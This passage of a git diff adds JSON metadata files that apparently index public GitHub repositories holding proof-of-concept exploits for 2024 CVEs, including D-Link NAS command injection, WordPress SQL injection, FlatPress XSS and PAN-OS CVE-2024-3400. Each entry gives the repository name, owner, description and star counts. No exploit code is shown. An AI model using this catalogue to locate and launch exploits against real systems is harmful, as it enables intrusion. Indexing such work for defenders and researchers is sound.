"https:\/\/avatars.githubusercontent.com\/u\/42248482?v=4", + "html_url": "https:\/\/github.com\/yarienkiva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yarienkiva\/honeypot-dlink-CVE-2024-3273", + "description": "Quick and dirty honeypot for CVE-2024-3273", + "fork": false, + "created_at": "2024-04-07T21:15:33Z", + "updated_at": "2024-04-07T21:40:55Z", + "pushed_at": "2024-04-16T00:00:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 784219188, + "name": "CVE-2024-3273-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-3273-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-3273-EXPLOIT", + "description": "A PoC exploit for CVE-2024-3273 - D-Link Remote Code Execution RCE", + "fork": false, + "created_at": "2024-04-09T12:26:37Z", + "updated_at": "2024-12-01T08:51:48Z", + "pushed_at": "2024-04-09T12:51:41Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "command-injections", + "cve-2024-3273", + "d-link", + "devices", + "exploit", + "exploitation", + "exploits", + "hacking", + "poc", + "proof-of-concept", + "rce-exploit", + "remote-code-execution", + "scanner", + "systems" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 784490856, + "name": "CVE-2024-3273", + "full_name": "ThatNotEasy\/CVE-2024-3273", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-3273", + "description": "D-Link NAS Command Execution Exploit", + "fork": false, + "created_at": "2024-04-10T00:27:02Z", + "updated_at": "2024-10-17T13:28:04Z", + "pushed_at": "2024-04-10T00:36:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787302962, + "name": "CVE-2024-3273", + "full_name": "LeopoldSkell\/CVE-2024-3273", + "owner": { + "login": "LeopoldSkell", + "id": 96363396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96363396?v=4", + "html_url": "https:\/\/github.com\/LeopoldSkell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LeopoldSkell\/CVE-2024-3273", + "description": null, + "fork": false, + "created_at": "2024-04-16T09:12:58Z", + "updated_at": "2024-04-16T09:12:58Z", + "pushed_at": "2024-04-16T09:12:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790582261, + "name": "CVE-2024-3273-", + "full_name": "mrrobot0o\/CVE-2024-3273-", + "owner": { + "login": "mrrobot0o", + "id": 88867340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88867340?v=4", + "html_url": "https:\/\/github.com\/mrrobot0o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrrobot0o\/CVE-2024-3273-", + "description": null, + "fork": false, + "created_at": "2024-04-23T06:31:19Z", + "updated_at": "2024-04-23T06:32:42Z", + "pushed_at": "2024-04-23T06:32:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796423211, + "name": "Turvan6rkus-CVE-2024-3273", + "full_name": "OIivr\/Turvan6rkus-CVE-2024-3273", + "owner": { + "login": "OIivr", + "id": 114483187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114483187?v=4", + "html_url": "https:\/\/github.com\/OIivr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OIivr\/Turvan6rkus-CVE-2024-3273", + "description": "Turvanõrkuse CVE 2024 3273 analüüs: D-Link seadmete käsusüst", + "fork": false, + "created_at": "2024-05-05T22:07:02Z", + "updated_at": "2024-09-04T15:36:02Z", + "pushed_at": "2024-05-25T17:27:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860862729, + "name": "CVE-2024-3273-D-Link-Remote-Code-Execution-RCE", + "full_name": "X-Projetion\/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE", + "description": "CVE-2024-3273 - D-Link Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-09-21T11:17:34Z", + "updated_at": "2024-09-21T11:24:51Z", + "pushed_at": "2024-09-21T11:24:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3293.json b/2024/CVE-2024-3293.json new file mode 100644 index 0000000000..674106cadb --- /dev/null +++ b/2024/CVE-2024-3293.json @@ -0,0 +1,33 @@ +[ + { + "id": 807945955, + "name": "CVE-2024-3293-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3293-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3293-Poc", + "description": "CVE-2024-3293 rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - Authenticated (Contributor+) SQL Injection via rtmedia_gallery Shortcode", + "fork": false, + "created_at": "2024-05-30T04:51:32Z", + "updated_at": "2024-06-26T12:03:21Z", + "pushed_at": "2024-05-30T05:00:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33111.json b/2024/CVE-2024-33111.json new file mode 100644 index 0000000000..3cddd49700 --- /dev/null +++ b/2024/CVE-2024-33111.json @@ -0,0 +1,33 @@ +[ + { + "id": 819977597, + "name": "CVE-2024-33111", + "full_name": "FaLLenSKiLL1\/CVE-2024-33111", + "owner": { + "login": "FaLLenSKiLL1", + "id": 43922662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43922662?v=4", + "html_url": "https:\/\/github.com\/FaLLenSKiLL1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FaLLenSKiLL1\/CVE-2024-33111", + "description": "D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via \/htdocs\/webinc\/js\/bsc_sms_inbox.php.", + "fork": false, + "created_at": "2024-06-25T14:54:01Z", + "updated_at": "2024-06-25T14:58:30Z", + "pushed_at": "2024-06-25T14:58:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33113.json b/2024/CVE-2024-33113.json new file mode 100644 index 0000000000..8aaca11b74 --- /dev/null +++ b/2024/CVE-2024-33113.json @@ -0,0 +1,64 @@ +[ + { + "id": 819580514, + "name": "CVE-2024-33113", + "full_name": "FaLLenSKiLL1\/CVE-2024-33113", + "owner": { + "login": "FaLLenSKiLL1", + "id": 43922662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43922662?v=4", + "html_url": "https:\/\/github.com\/FaLLenSKiLL1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FaLLenSKiLL1\/CVE-2024-33113", + "description": "D-LINK DIR-845L is vulnerable to information disclosure via the bsc_sms_inbox.php file.", + "fork": false, + "created_at": "2024-06-24T19:50:13Z", + "updated_at": "2024-08-29T13:31:13Z", + "pushed_at": "2024-06-24T21:27:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 819959946, + "name": "CVE-2024-33113", + "full_name": "tekua\/CVE-2024-33113", + "owner": { + "login": "tekua", + "id": 38267231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38267231?v=4", + "html_url": "https:\/\/github.com\/tekua", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tekua\/CVE-2024-33113", + "description": "Le routeur D-LINK DIR-845L est vulnérable à un problème de divulgation d'informations. Plus précisément, le fichier bsc_sms_inbox.php sur l'appareil peut être exploité pour divulguer des informations sensibles.", + "fork": false, + "created_at": "2024-06-25T14:16:03Z", + "updated_at": "2024-06-25T14:44:24Z", + "pushed_at": "2024-06-25T14:42:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33209.json b/2024/CVE-2024-33209.json new file mode 100644 index 0000000000..b0230590d4 --- /dev/null +++ b/2024/CVE-2024-33209.json @@ -0,0 +1,33 @@ +[ + { + "id": 864440771, + "name": "CVE-2024-33209", + "full_name": "paragbagul111\/CVE-2024-33209", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-33209", + "description": "FlatPress 1.3. is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript code into the \"Add New Entry\" section, which allows them to execute arbitrary code in the context of a victim's web browser.", + "fork": false, + "created_at": "2024-09-28T08:17:01Z", + "updated_at": "2024-09-28T08:21:06Z", + "pushed_at": "2024-09-28T08:21:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33210.json b/2024/CVE-2024-33210.json new file mode 100644 index 0000000000..fa47a67ab4 --- /dev/null +++ b/2024/CVE-2024-33210.json @@ -0,0 +1,33 @@ +[ + { + "id": 864442880, + "name": "CVE-2024-33210", + "full_name": "paragbagul111\/CVE-2024-33210", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-33210", + "description": "A cross-site scripting (XSS) vulnerability has been identified in Flatpress 1.3. This vulnerability allows an attacker to inject malicious scripts into web pages viewed by other users.", + "fork": false, + "created_at": "2024-09-28T08:24:42Z", + "updated_at": "2024-09-28T08:29:18Z", + "pushed_at": "2024-09-28T08:29:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33231.json b/2024/CVE-2024-33231.json new file mode 100644 index 0000000000..29038e16de --- /dev/null +++ b/2024/CVE-2024-33231.json @@ -0,0 +1,37 @@ +[ + { + "id": 875006628, + "name": "CVE-2024-33231", + "full_name": "fdzdev\/CVE-2024-33231", + "owner": { + "login": "fdzdev", + "id": 17630462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17630462?v=4", + "html_url": "https:\/\/github.com\/fdzdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fdzdev\/CVE-2024-33231", + "description": "XSS Vulnerability via File Upload in Ferozo Webmail Application", + "fork": false, + "created_at": "2024-10-18T22:09:27Z", + "updated_at": "2024-11-13T07:54:01Z", + "pushed_at": "2024-10-18T22:13:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-33231", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33352.json b/2024/CVE-2024-33352.json new file mode 100644 index 0000000000..3343ecf72a --- /dev/null +++ b/2024/CVE-2024-33352.json @@ -0,0 +1,41 @@ +[ + { + "id": 829319256, + "name": "CVE-2024-33352", + "full_name": "mmiszczyk\/CVE-2024-33352", + "owner": { + "login": "mmiszczyk", + "id": 20739931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20739931?v=4", + "html_url": "https:\/\/github.com\/mmiszczyk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mmiszczyk\/CVE-2024-33352", + "description": "BlueStacks privilege escalation through VM backdooring", + "fork": false, + "created_at": "2024-07-16T07:38:19Z", + "updated_at": "2024-12-08T12:11:30Z", + "pushed_at": "2024-07-16T09:12:57Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "android-emulator", + "cve", + "exploit", + "privilege-escalation", + "security", + "vm-escape" + ], + "visibility": "public", + "forks": 3, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33453.json b/2024/CVE-2024-33453.json new file mode 100644 index 0000000000..ffb6f15238 --- /dev/null +++ b/2024/CVE-2024-33453.json @@ -0,0 +1,33 @@ +[ + { + "id": 851484894, + "name": "CVE-2024-33453", + "full_name": "Ant1sec-ops\/CVE-2024-33453", + "owner": { + "login": "Ant1sec-ops", + "id": 98224710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98224710?v=4", + "html_url": "https:\/\/github.com\/Ant1sec-ops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ant1sec-ops\/CVE-2024-33453", + "description": "Sensitive Data exposure ", + "fork": false, + "created_at": "2024-09-03T07:21:25Z", + "updated_at": "2024-09-04T13:08:33Z", + "pushed_at": "2024-09-04T13:08:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33559.json b/2024/CVE-2024-33559.json new file mode 100644 index 0000000000..3ac0d9fc5a --- /dev/null +++ b/2024/CVE-2024-33559.json @@ -0,0 +1,33 @@ +[ + { + "id": 801864496, + "name": "WordPress-XStore-theme-SQL-Injection", + "full_name": "absholi7ly\/WordPress-XStore-theme-SQL-Injection", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/WordPress-XStore-theme-SQL-Injection", + "description": "(CVE-2024-33559) The XStore theme for WordPress is vulnerable to SQL Injection due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query", + "fork": false, + "created_at": "2024-05-17T04:15:34Z", + "updated_at": "2024-10-14T23:33:27Z", + "pushed_at": "2024-05-17T04:20:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33644.json b/2024/CVE-2024-33644.json new file mode 100644 index 0000000000..646a1b17fb --- /dev/null +++ b/2024/CVE-2024-33644.json @@ -0,0 +1,33 @@ +[ + { + "id": 845237835, + "name": "ReproducingCVEs_Akshath_Nagulapally", + "full_name": "Akshath-Nagulapally\/ReproducingCVEs_Akshath_Nagulapally", + "owner": { + "login": "Akshath-Nagulapally", + "id": 140837101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140837101?v=4", + "html_url": "https:\/\/github.com\/Akshath-Nagulapally", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akshath-Nagulapally\/ReproducingCVEs_Akshath_Nagulapally", + "description": "Reproducing the following CVEs with dockerfile:CVE-2024-33644 CVE-2024-34370 CVE-2024-22120", + "fork": false, + "created_at": "2024-08-20T21:27:49Z", + "updated_at": "2024-08-20T21:27:53Z", + "pushed_at": "2024-08-20T21:27:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33722.json b/2024/CVE-2024-33722.json new file mode 100644 index 0000000000..246a974799 --- /dev/null +++ b/2024/CVE-2024-33722.json @@ -0,0 +1,33 @@ +[ + { + "id": 790393442, + "name": "soplanning-1.52-exploits", + "full_name": "fuzzlove\/soplanning-1.52-exploits", + "owner": { + "login": "fuzzlove", + "id": 44779781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4", + "html_url": "https:\/\/github.com\/fuzzlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuzzlove\/soplanning-1.52-exploits", + "description": "SOPlanning 1.52.00 CSRF\/SQLi\/XSS (CVE-2024-33722, CVE-2024-33724)", + "fork": false, + "created_at": "2024-04-22T19:51:18Z", + "updated_at": "2024-05-07T14:23:34Z", + "pushed_at": "2024-05-07T14:23:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33775.json b/2024/CVE-2024-33775.json new file mode 100644 index 0000000000..6f78d6e78b --- /dev/null +++ b/2024/CVE-2024-33775.json @@ -0,0 +1,33 @@ +[ + { + "id": 794619582, + "name": "CVE-2024-33775", + "full_name": "Neo-XeD\/CVE-2024-33775", + "owner": { + "login": "Neo-XeD", + "id": 168660736, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168660736?v=4", + "html_url": "https:\/\/github.com\/Neo-XeD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Neo-XeD\/CVE-2024-33775", + "description": null, + "fork": false, + "created_at": "2024-05-01T15:46:32Z", + "updated_at": "2024-05-01T16:42:27Z", + "pushed_at": "2024-05-01T16:38:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33883.json b/2024/CVE-2024-33883.json new file mode 100644 index 0000000000..9b55247a8b --- /dev/null +++ b/2024/CVE-2024-33883.json @@ -0,0 +1,37 @@ +[ + { + "id": 820074511, + "name": "PoC-CVE-2024-33883", + "full_name": "Grantzile\/PoC-CVE-2024-33883", + "owner": { + "login": "Grantzile", + "id": 88519798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88519798?v=4", + "html_url": "https:\/\/github.com\/Grantzile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Grantzile\/PoC-CVE-2024-33883", + "description": "PoC of CVE-2024-33883, RCE vulnerability of ejs.", + "fork": false, + "created_at": "2024-06-25T18:40:31Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-07-06T19:51:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ejs", + "rce-exploit", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33901.json b/2024/CVE-2024-33901.json new file mode 100644 index 0000000000..efd27dc2fb --- /dev/null +++ b/2024/CVE-2024-33901.json @@ -0,0 +1,33 @@ +[ + { + "id": 893321019, + "name": "CVE-2024-33901-ProofOfConcept", + "full_name": "gmikisilva\/CVE-2024-33901-ProofOfConcept", + "owner": { + "login": "gmikisilva", + "id": 101853134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101853134?v=4", + "html_url": "https:\/\/github.com\/gmikisilva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmikisilva\/CVE-2024-33901-ProofOfConcept", + "description": "Short program that demonstrates the vulnerability CVE-2024-33901 in KeePassXC version 2.7.7", + "fork": false, + "created_at": "2024-11-24T05:43:27Z", + "updated_at": "2024-11-25T06:15:40Z", + "pushed_at": "2024-11-24T23:34:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33911.json b/2024/CVE-2024-33911.json new file mode 100644 index 0000000000..a6cde5f6e8 --- /dev/null +++ b/2024/CVE-2024-33911.json @@ -0,0 +1,33 @@ +[ + { + "id": 796239614, + "name": "CVE-2024-33911", + "full_name": "xbz0n\/CVE-2024-33911", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-33911", + "description": null, + "fork": false, + "created_at": "2024-05-05T11:14:47Z", + "updated_at": "2024-05-20T09:31:52Z", + "pushed_at": "2024-05-05T11:23:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3393.json b/2024/CVE-2024-3393.json new file mode 100644 index 0000000000..b06921163c --- /dev/null +++ b/2024/CVE-2024-3393.json @@ -0,0 +1,33 @@ +[ + { + "id": 911931261, + "name": "-CVE-2024-3393", + "full_name": "FelixFoxf\/-CVE-2024-3393", + "owner": { + "login": "FelixFoxf", + "id": 114032917, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114032917?v=4", + "html_url": "https:\/\/github.com\/FelixFoxf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FelixFoxf\/-CVE-2024-3393", + "description": " CVE-2024-3393 EXPLOIT", + "fork": false, + "created_at": "2025-01-04T08:18:06Z", + "updated_at": "2025-01-07T04:28:29Z", + "pushed_at": "2025-01-04T08:19:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3400.json b/2024/CVE-2024-3400.json new file mode 100644 index 0000000000..ff50f00713 --- /dev/null +++ b/2024/CVE-2024-3400.json @@ -0,0 +1,1164 @@ +[ + { + "id": 785991655, + "name": "CVE-2024-3400", + "full_name": "Yuvvi01\/CVE-2024-3400", + "owner": { + "login": "Yuvvi01", + "id": 70095030, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70095030?v=4", + "html_url": "https:\/\/github.com\/Yuvvi01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yuvvi01\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-13T05:16:21Z", + "updated_at": "2024-07-17T13:47:53Z", + "pushed_at": "2024-04-13T05:20:15Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786090468, + "name": "CVE-2024-3400-PoC", + "full_name": "CerTusHack\/CVE-2024-3400-PoC", + "owner": { + "login": "CerTusHack", + "id": 92284780, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92284780?v=4", + "html_url": "https:\/\/github.com\/CerTusHack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CerTusHack\/CVE-2024-3400-PoC", + "description": null, + "fork": false, + "created_at": "2024-04-13T11:55:53Z", + "updated_at": "2024-04-20T15:20:03Z", + "pushed_at": "2024-04-13T20:51:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 786123425, + "name": "CVE-2024-3400", + "full_name": "0x0d3ad\/CVE-2024-3400", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2024-3400", + "description": "CVE-2024-3400", + "fork": false, + "created_at": "2024-04-13T14:00:31Z", + "updated_at": "2024-12-31T01:26:44Z", + "pushed_at": "2024-04-18T07:11:17Z", + "stargazers_count": 66, + "watchers_count": 66, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 66, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 786201656, + "name": "CVE-2024-3400", + "full_name": "FoxyProxys\/CVE-2024-3400", + "owner": { + "login": "FoxyProxys", + "id": 166161106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4", + "html_url": "https:\/\/github.com\/FoxyProxys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:14:47Z", + "updated_at": "2024-04-16T13:04:58Z", + "pushed_at": "2024-04-16T13:04:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786473067, + "name": "CVE-2024-3400", + "full_name": "momika233\/CVE-2024-3400", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-14T15:16:16Z", + "updated_at": "2024-05-17T06:47:57Z", + "pushed_at": "2024-04-14T15:20:34Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": 